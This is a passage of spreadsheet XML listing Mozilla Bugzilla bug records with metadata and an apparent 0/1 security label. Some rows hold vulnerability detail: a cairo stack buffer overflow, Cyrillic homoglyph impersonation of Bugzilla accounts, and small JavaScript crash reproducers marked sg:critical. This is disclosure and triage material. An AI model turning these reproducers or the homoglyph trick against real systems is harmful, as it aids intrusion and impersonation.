ReleaseChannel: release
SecondsSinceLastCrash: 508
StartupTime: 1391120365
SystemMemoryUsePercentage: 64
Theme: classic/1.0
Throttleable: 1
TotalVirtualMemory: 4294836224
URL: about:home
Vendor: Mozilla
Version: 26.0
Winsock_LSP: MSAFD Tcpip [TCP/IP] : 2 : 1 : %SystemRoot%\system32\mswsock.dll 
 MSAFD Tcpip [UDP/IP] : 2 : 2 :  
 MSAFD Tcpip [RAW/IP] : 2 : 3 : %SystemRoot%\system32\mswsock.dll 
 MSAFD Tcpip [TCP/IPv6] : 2 : 1 :  
 MSAFD Tcpip [UDP/IPv6] : 2 : 2 : %SystemRoot%\system32\mswsock.dll 
 MSAFD Tcpip [RAW/IPv6] : 2 : 3 :  
 RSVP TCPv6 Service Provider : 2 : 1 : %SystemRoot%\system32\mswsock.dll 
 RSVP TCP Service Provider : 2 : 1 :  
 RSVP UDPv6 Service Provider : 2 : 2 : %SystemRoot%\system32\mswsock.dll 
 RSVP UDP Service Provider : 2 : 2 : 
useragent_locale: en-US
Actual results:
FireFox crashes. Attaching a debugger, I found that _cairo_truetype_index_to_ucs4 allocates a 4-byte array (buf) and passes it to _cairo_dwrite_load_truetype_table, which loads over 8K of data and uses memcpy to copy it to that buffer. This totally trashes the stack, so you can see what is happening much better if you set a breakpoint to stop things BEFORE the memcpy in line 1057 of mozilla-release\gfx\cairo\cairo\src\cairo-dwrite-font.cpp.
Expected results:
The current web page should be converted to pdf and written to c:\temp\problem.pdf.
(This is not what I'm really trying to do...I really want to call this code through geckofx from .NET as in https://bugzilla.mozilla.org/show_bug.cgi?id=922523. But I've been trying to move things along by pinning down a simpler repro.)</t>
        </is>
      </c>
      <c r="X1381" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" t="n">
        <v>522151</v>
      </c>
      <c r="B1382" t="inlineStr">
        <is>
          <t>2009-10-13 16:31:53 -0700</t>
        </is>
      </c>
      <c r="C1382" t="inlineStr">
        <is>
          <t>[SUMO] Forum links in My Account-&gt;My Watches are not pretty</t>
        </is>
      </c>
      <c r="D1382" t="inlineStr">
        <is>
          <t>2009-10-30 09:49:57 -0700</t>
        </is>
      </c>
      <c r="E1382" t="n">
        <v>1</v>
      </c>
      <c r="F1382" t="n">
        <v>1</v>
      </c>
      <c r="G1382" t="n">
        <v>5</v>
      </c>
      <c r="H1382" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1382" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1382" t="inlineStr">
        <is>
          <t>Forum</t>
        </is>
      </c>
      <c r="K1382" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1382" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1382" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1382" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1382" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1382" t="inlineStr">
        <is>
          <t>sumo_only urlhandling</t>
        </is>
      </c>
      <c r="Q1382" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1382" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1382" t="inlineStr">
        <is>
          <t>1.4.1</t>
        </is>
      </c>
      <c r="T1382" t="n">
        <v>1</v>
      </c>
      <c r="U1382" t="n">
        <v>0</v>
      </c>
      <c r="V1382" t="n">
        <v>10</v>
      </c>
      <c r="W1382" t="inlineStr">
        <is>
          <t>Summary: [SUMO] Forum links in My Account-&gt;My Watches are not pretty
Pre-condition: You need to be watching a forum topic
Steps to reproduce:
1. log into SUMO Stage
2. go to My Account-&gt;My Watches
3. click on one of the forum you are watching
expected result:
forum url will be in the new format, https://support-stage.mozilla.org/en-US/forum/1/446834
actual result:
forum URL is in the old format, https://support-stage.mozilla.org/tiki-user_watches.php?locale=en-US</t>
        </is>
      </c>
      <c r="X1382" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" t="n">
        <v>1464667</v>
      </c>
      <c r="B1383" t="inlineStr">
        <is>
          <t>2018-05-27 04:30:13 -0700</t>
        </is>
      </c>
      <c r="C1383" t="inlineStr">
        <is>
          <t>Suppress &lt;plaintext&gt; in email messages</t>
        </is>
      </c>
      <c r="D1383" t="inlineStr">
        <is>
          <t>2018-07-13 13:29:16 -0700</t>
        </is>
      </c>
      <c r="E1383" t="n">
        <v>1</v>
      </c>
      <c r="F1383" t="n">
        <v>1</v>
      </c>
      <c r="G1383" t="n">
        <v>3</v>
      </c>
      <c r="H1383" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1383" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J1383" t="inlineStr">
        <is>
          <t>MIME</t>
        </is>
      </c>
      <c r="K1383" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1383" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1383" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1383" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1383" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1383" t="inlineStr"/>
      <c r="Q1383" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1383" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1383" t="inlineStr">
        <is>
          <t>Thunderbird 62.0</t>
        </is>
      </c>
      <c r="T1383" t="n">
        <v>1</v>
      </c>
      <c r="U1383" t="n">
        <v>0</v>
      </c>
      <c r="V1383" t="n">
        <v>39</v>
      </c>
      <c r="W1383" t="inlineStr">
        <is>
          <t>Created attachment 8980969
test case - repace with &lt;pre&gt; to see the difference
MDN says firefox doesn't support &lt;plaintext&gt; - https://developer.mozilla.org/en-US/docs/Web/HTML/Element/plaintext
... but it seems it does. 
It's not treated as &lt;pre&gt;, but really treated as &lt;plaintext&gt;, which has no closing tag(!!). This makes for some pretty interesting and unexpected dom trees in cases when you hope the parser would make sense of the garbage you throw at it. Like bug 1464056 comment 18 - where for some cases Thunderbird is pulling two doms together and displaying them in one.
I'd suggest actually removing support for &lt;plaintext&gt; since at least according to mdn no browser supports it.</t>
        </is>
      </c>
      <c r="X1383" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" t="n">
        <v>1082241</v>
      </c>
      <c r="B1384" t="inlineStr">
        <is>
          <t>2014-10-13 17:10:58 -0700</t>
        </is>
      </c>
      <c r="C1384" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.30</t>
        </is>
      </c>
      <c r="D1384" t="inlineStr">
        <is>
          <t>2014-11-30 16:52:48 -0800</t>
        </is>
      </c>
      <c r="E1384" t="n">
        <v>1</v>
      </c>
      <c r="F1384" t="n">
        <v>1</v>
      </c>
      <c r="G1384" t="n">
        <v>2</v>
      </c>
      <c r="H1384" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1384" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1384" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K1384" t="inlineStr">
        <is>
          <t>SeaMonkey 2.30 Branch</t>
        </is>
      </c>
      <c r="L1384" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1384" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1384" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1384" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1384" t="inlineStr"/>
      <c r="Q1384" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1384" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1384" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1384" t="n">
        <v>1</v>
      </c>
      <c r="U1384" t="n">
        <v>0</v>
      </c>
      <c r="V1384" t="n">
        <v>4</v>
      </c>
      <c r="W1384" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.30
We expect an actual release on Wednesday 14th October.</t>
        </is>
      </c>
      <c r="X1384" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1385">
      <c r="A1385" t="n">
        <v>1170805</v>
      </c>
      <c r="B1385" t="inlineStr">
        <is>
          <t>2015-06-02 15:38:22 -0700</t>
        </is>
      </c>
      <c r="C1385" t="inlineStr">
        <is>
          <t>Clean up Vagrant apache config</t>
        </is>
      </c>
      <c r="D1385" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E1385" t="n">
        <v>1</v>
      </c>
      <c r="F1385" t="n">
        <v>1</v>
      </c>
      <c r="G1385" t="n">
        <v>7</v>
      </c>
      <c r="H1385" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1385" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1385" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1385" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1385" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1385" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1385" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1385" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1385" t="inlineStr"/>
      <c r="Q1385" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1385" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1385" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1385" t="n">
        <v>1</v>
      </c>
      <c r="U1385" t="n">
        <v>0</v>
      </c>
      <c r="V1385" t="n">
        <v>5</v>
      </c>
      <c r="W1385" t="inlineStr">
        <is>
          <t>For bug 1151803 I'm going to need to figure out appropriate redirect rules to emulate the apache config.
To make this easier, there are a few things I can clean up in the apache config to make it easier to grok.</t>
        </is>
      </c>
      <c r="X1385" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1386">
      <c r="A1386" t="n">
        <v>50973</v>
      </c>
      <c r="B1386" t="inlineStr">
        <is>
          <t>2000-08-31 15:47:59 -0700</t>
        </is>
      </c>
      <c r="C1386" t="inlineStr">
        <is>
          <t>No sidebar panels</t>
        </is>
      </c>
      <c r="D1386" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E1386" t="n">
        <v>1</v>
      </c>
      <c r="F1386" t="n">
        <v>1</v>
      </c>
      <c r="G1386" t="n">
        <v>2</v>
      </c>
      <c r="H1386" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1386" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1386" t="inlineStr">
        <is>
          <t>Sidebar</t>
        </is>
      </c>
      <c r="K1386" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1386" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1386" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1386" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1386" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1386" t="inlineStr">
        <is>
          <t>[dogfood+]</t>
        </is>
      </c>
      <c r="Q1386" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1386" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1386" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1386" t="n">
        <v>1</v>
      </c>
      <c r="U1386" t="n">
        <v>0</v>
      </c>
      <c r="V1386" t="n">
        <v>43</v>
      </c>
      <c r="W1386" t="inlineStr">
        <is>
          <t>- launch mozilla
- open sidebar (or have it open when app launches, doesn't matter)
expected:
- see sidebar panels
actual:
- no sidebar panels at all. area is blank except for "My Sidebar" header
both mac/win32 builds from 11am 8/31/00</t>
        </is>
      </c>
      <c r="X1386" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1387">
      <c r="A1387" t="n">
        <v>714472</v>
      </c>
      <c r="B1387" t="inlineStr">
        <is>
          <t>2011-12-31 12:30:17 -0800</t>
        </is>
      </c>
      <c r="C1387" t="inlineStr">
        <is>
          <t>[SECURITY] utf8 homoglyphs are allowed in email addresses, which could allow an attacker to be CC'ed to private bugs by accident</t>
        </is>
      </c>
      <c r="D1387" t="inlineStr">
        <is>
          <t>2013-01-28 10:07:33 -0800</t>
        </is>
      </c>
      <c r="E1387" t="n">
        <v>1</v>
      </c>
      <c r="F1387" t="n">
        <v>1</v>
      </c>
      <c r="G1387" t="n">
        <v>4</v>
      </c>
      <c r="H1387" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1387" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1387" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K1387" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L1387" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1387" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1387" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1387" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1387" t="inlineStr">
        <is>
          <t>[infrasec:input][ws:moderate]</t>
        </is>
      </c>
      <c r="Q1387" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1387" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1387" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T1387" t="n">
        <v>1</v>
      </c>
      <c r="U1387" t="n">
        <v>0</v>
      </c>
      <c r="V1387" t="n">
        <v>29</v>
      </c>
      <c r="W1387" t="inlineStr">
        <is>
          <t>Bugzilla allows utf8 in email addresses, including characters in the Cryllic alphabet that look identical to standard ascii letters. For example, admin@mozilla.org and аdmin@mozilla.org are two distinct email addresses (the latter has a Cryllic a). Given that email addresses are used as usernames, this poses an impersonation risk. It could also be used by an attacker to maintain access to a victim's account, since their email address wouldn't appear to have changed.
Such attacks are severely limited by bugzilla's email validation process. I have been unable to figure out where emails sent by the current version of BMO to addresses containing utf8 actually end up. Bugzilla 4.2rc1+ sends emails to addresses with utf8 preceding the @ fine (eg bаd@sunday.slyip.net), but again utf8 in the domain name (eg good@fridаy.slyip.net) causes the emails to go missing. Allowing utf8 in the domain name would be much worse, since anyone could register gmаil.com or mozillа.org
I'm not yet certain that I have fully explored the threats posed by this.</t>
        </is>
      </c>
      <c r="X1387" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1388">
      <c r="A1388" t="n">
        <v>701248</v>
      </c>
      <c r="B1388" t="inlineStr">
        <is>
          <t>2011-11-09 17:10:12 -0800</t>
        </is>
      </c>
      <c r="C1388" t="inlineStr">
        <is>
          <t>Assertion failure: ((js::SrcNoteType)(((*(sn) &gt;&gt; 3) &gt;= SRC_XDELTA) ? SRC_XDELTA : *(sn) &gt;&gt; 3)) == SRC_DESTRUCT, at jsopcode.cpp:3543</t>
        </is>
      </c>
      <c r="D1388" t="inlineStr">
        <is>
          <t>2013-01-19 13:58:19 -0800</t>
        </is>
      </c>
      <c r="E1388" t="n">
        <v>1</v>
      </c>
      <c r="F1388" t="n">
        <v>1</v>
      </c>
      <c r="G1388" t="n">
        <v>3</v>
      </c>
      <c r="H1388" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1388" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1388" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1388" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1388" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1388" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1388" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1388" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1388" t="inlineStr">
        <is>
          <t>[sg:critical] fixed by 685321 [qa!]</t>
        </is>
      </c>
      <c r="Q1388" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1388" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1388" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1388" t="n">
        <v>1</v>
      </c>
      <c r="U1388" t="n">
        <v>0</v>
      </c>
      <c r="V1388" t="n">
        <v>10</v>
      </c>
      <c r="W1388" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision c60535115ea1 (no options required):
function F(x, y) {
  var { j, y, p, a } = testSyntax("#1=&lt;a&gt;b&lt;/a&gt;", true) =  this;
}
var src = F.toSource(-1)+"\n";
Could be related to a decompiler patch that landed recently, Cc'ing Luke and Waldo.</t>
        </is>
      </c>
      <c r="X1388" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1389">
      <c r="A1389" t="n">
        <v>14478</v>
      </c>
      <c r="B1389" t="inlineStr">
        <is>
          <t>1999-09-21 15:08:23 -0700</t>
        </is>
      </c>
      <c r="C1389" t="inlineStr">
        <is>
          <t>[BLOCKER] insert object dialogs do not appear</t>
        </is>
      </c>
      <c r="D1389" t="inlineStr">
        <is>
          <t>2018-06-20 15:30:44 -0700</t>
        </is>
      </c>
      <c r="E1389" t="n">
        <v>1</v>
      </c>
      <c r="F1389" t="n">
        <v>1</v>
      </c>
      <c r="G1389" t="n">
        <v>3</v>
      </c>
      <c r="H1389" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1389" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1389" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1389" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1389" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1389" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1389" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1389" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1389" t="inlineStr"/>
      <c r="Q1389" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1389" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1389" t="inlineStr">
        <is>
          <t>M11</t>
        </is>
      </c>
      <c r="T1389" t="n">
        <v>1</v>
      </c>
      <c r="U1389" t="n">
        <v>0</v>
      </c>
      <c r="V1389" t="n">
        <v>6</v>
      </c>
      <c r="W1389" t="inlineStr">
        <is>
          <t>insert table or insert image dialogs display only a titlebar, not any dialog
content.  By contrast, the Find dialog still works ok.  Looks like broken XUL
symptoms.
Both broken dialogs give this assertion:
RDFXULBuilderImpl::CreateElement(nsINameSpace * 0x02b66680, nsIRDFResource *
0x029fb9a0, int 0, nsIContent * * 0x0012d7d0) line 771 + 38 bytes
RDFXULBuilderImpl::CreateChildrenFromGraph(nsINameSpace * 0x02b66680,
nsIRDFResource * 0x02b26820, nsIContent * 0x02b66c20, int 0) line 646 + 55 bytes
RDFXULBuilderImpl::CreateRootContent(RDFXULBuilderImpl * const 0x02b63210,
nsIRDFResource * 0x02b26820) line 522 + 35 bytes
XULDocumentImpl::EndLoad(XULDocumentImpl * const 0x02b1c530) line 2066 + 44
bytes
XULContentSinkImpl::DidBuildModel(XULContentSinkImpl * const 0x02b1ec90, int 1)
line 528
CWellFormedDTD::DidBuildModel(CWellFormedDTD * const 0x02b1e1d0, unsigned int 0,
int 1, nsIParser * 0x02b1e7b0, nsIContentSink * 0x02b1ec90) line 287 + 20 bytes
nsParser::DidBuildModel(unsigned int 0) line 539 + 55 bytes
nsParser::ResumeParse(nsIDTD * 0x00000000, int 0) line 923
nsParser::EnableParser(int 1) line 634 + 15 bytes
XULContentSinkImpl::UpdateOverlayCounters(XULContentSinkImpl * const 0x02b1ec90,
int -1) line 1906 + 19 bytes
XULContentSinkImpl::CloseContainer(XULContentSinkImpl * const 0x02b62450, const
nsIParserNode &amp; {...}) line 686
CWellFormedDTD::HandleEndToken(CToken * 0x01c9b5a0) line 618 + 43 bytes
CWellFormedDTD::HandleToken(CWellFormedDTD * const 0x02b62820, CToken *
0x01c9b5a0, nsIParser * 0x02b621d0) line 479 + 12 bytes
CWellFormedDTD::BuildModel(CWellFormedDTD * const 0x02b62820, nsIParser *
0x02b621d0, nsITokenizer * 0x02b62da0, nsITokenObserver * 0x00000000,
nsIContentSink * 0x02b62450) line 254 + 20 bytes
nsParser::BuildModel() line 972 + 34 bytes
nsParser::ResumeParse(nsIDTD * 0x00000000, int 0) line 910 + 11 bytes
nsParser::OnDataAvailable(nsParser * const 0x02b621d4, nsIChannel * 0x02b61490,
nsISupports * 0x00000000, nsIInputStream * 0x02b615e8, unsigned int 0, unsigned
int 1472) line 1327 + 19 bytes
nsDocumentBindInfo::OnDataAvailable(nsDocumentBindInfo * const 0x02b61a30,
nsIChannel * 0x02b61490, nsISupports * 0x00000000, nsIInputStream * 0x02b615e8,
unsigned int 0, unsigned int 1472) line 1349 + 32 bytes
nsChannelListener::OnDataAvailable(nsChannelListener * const 0x02b611b0,
nsIChannel * 0x02b61490, nsISupports * 0x00000000, nsIInputStream * 0x02b615e8,
unsigned int 0, unsigned int 1472) line 1591
nsFileChannel::OnDataAvailable(nsFileChannel * const 0x02b61494, nsIChannel *
0x02b62f20, nsISupports * 0x00000000, nsIInputStream * 0x02b615e8, unsigned int
0, unsigned int 1472) line 487
nsOnDataAvailableEvent::HandleEvent(nsOnDataAvailableEvent * const 0x02b61550)
line 359
nsStreamListenerEvent::HandlePLEvent(PLEvent * 0x02b61930) line 152 + 12 bytes
PL_HandleEvent(PLEvent * 0x02b61930) line 541 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x02b3c240) line 500 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x2c4d087e, unsigned int 49377, unsigned int 0,
long 45335104) line 970 + 9 bytes</t>
        </is>
      </c>
      <c r="X1389" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" t="n">
        <v>472787</v>
      </c>
      <c r="B1390" t="inlineStr">
        <is>
          <t>2009-01-08 21:31:05 -0800</t>
        </is>
      </c>
      <c r="C1390" t="inlineStr">
        <is>
          <t>Hang involving gczeal</t>
        </is>
      </c>
      <c r="D1390" t="inlineStr">
        <is>
          <t>2009-03-05 17:49:39 -0800</t>
        </is>
      </c>
      <c r="E1390" t="n">
        <v>1</v>
      </c>
      <c r="F1390" t="n">
        <v>1</v>
      </c>
      <c r="G1390" t="n">
        <v>3</v>
      </c>
      <c r="H1390" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1390" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1390" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1390" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1390" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1390" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1390" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1390" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1390" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey, post 1.8-branch</t>
        </is>
      </c>
      <c r="Q1390" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1390" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1390" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1390" t="n">
        <v>1</v>
      </c>
      <c r="U1390" t="n">
        <v>0</v>
      </c>
      <c r="V1390" t="n">
        <v>22</v>
      </c>
      <c r="W1390" t="inlineStr">
        <is>
          <t>this.__defineSetter__("x", Math.sin)
this.watch("x", '' .concat)
gczeal(2)
x = 1
This hangs 1.9.0.x debug and trunk debug (with and without -j). Doesn't seem to affect opt because opt by default doesn't compile with the gczeal function.
Security-sensitive because of the gczeal function. Thanks Jesse for helping with the process of reduction.</t>
        </is>
      </c>
      <c r="X1390" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" t="n">
        <v>1339151</v>
      </c>
      <c r="B1391" t="inlineStr">
        <is>
          <t>2017-02-13 10:48:50 -0800</t>
        </is>
      </c>
      <c r="C1391" t="inlineStr">
        <is>
          <t>Use different tasks for signed and unsigned bits in release promotion</t>
        </is>
      </c>
      <c r="D1391" t="inlineStr">
        <is>
          <t>2017-03-03 13:03:14 -0800</t>
        </is>
      </c>
      <c r="E1391" t="n">
        <v>1</v>
      </c>
      <c r="F1391" t="n">
        <v>1</v>
      </c>
      <c r="G1391" t="n">
        <v>5</v>
      </c>
      <c r="H1391" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1391" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1391" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K1391" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1391" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1391" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1391" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1391" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1391" t="inlineStr"/>
      <c r="Q1391" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1391" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1391" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1391" t="n">
        <v>1</v>
      </c>
      <c r="U1391" t="n">
        <v>0</v>
      </c>
      <c r="V1391" t="n">
        <v>22</v>
      </c>
      <c r="W1391" t="inlineStr">
        <is>
          <t>After we switch to Tc based CI builds we have to use different tasks for signed (installers, MARs, etc) and unsigned (tests.zip, simbols, etC) bits in releasetasks.
The changes should ride the trains.
At least `task_for_revision()` https://hg.mozilla.org/build/tools/file/tip/lib/python/kickoff/__init__.py#l161 should change the behaviour to read the routes from somewhere else. As a possible solution we can use in-tree configs and checkout them run-time in releaserunner.</t>
        </is>
      </c>
      <c r="X1391" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1392">
      <c r="A1392" t="n">
        <v>1455468</v>
      </c>
      <c r="B1392" t="inlineStr">
        <is>
          <t>2018-04-19 15:58:27 -0700</t>
        </is>
      </c>
      <c r="C1392" t="inlineStr">
        <is>
          <t>Possible delay in repo sync when landing with Lando</t>
        </is>
      </c>
      <c r="D1392" t="inlineStr">
        <is>
          <t>2022-09-06 09:49:12 -0700</t>
        </is>
      </c>
      <c r="E1392" t="n">
        <v>1</v>
      </c>
      <c r="F1392" t="n">
        <v>1</v>
      </c>
      <c r="G1392" t="n">
        <v>7</v>
      </c>
      <c r="H1392" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1392" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J1392" t="inlineStr">
        <is>
          <t>Lando</t>
        </is>
      </c>
      <c r="K1392" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1392" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1392" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1392" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1392" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1392" t="inlineStr"/>
      <c r="Q1392" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1392" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1392" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1392" t="n">
        <v>1</v>
      </c>
      <c r="U1392" t="n">
        <v>0</v>
      </c>
      <c r="V1392" t="n">
        <v>6</v>
      </c>
      <c r="W1392" t="inlineStr">
        <is>
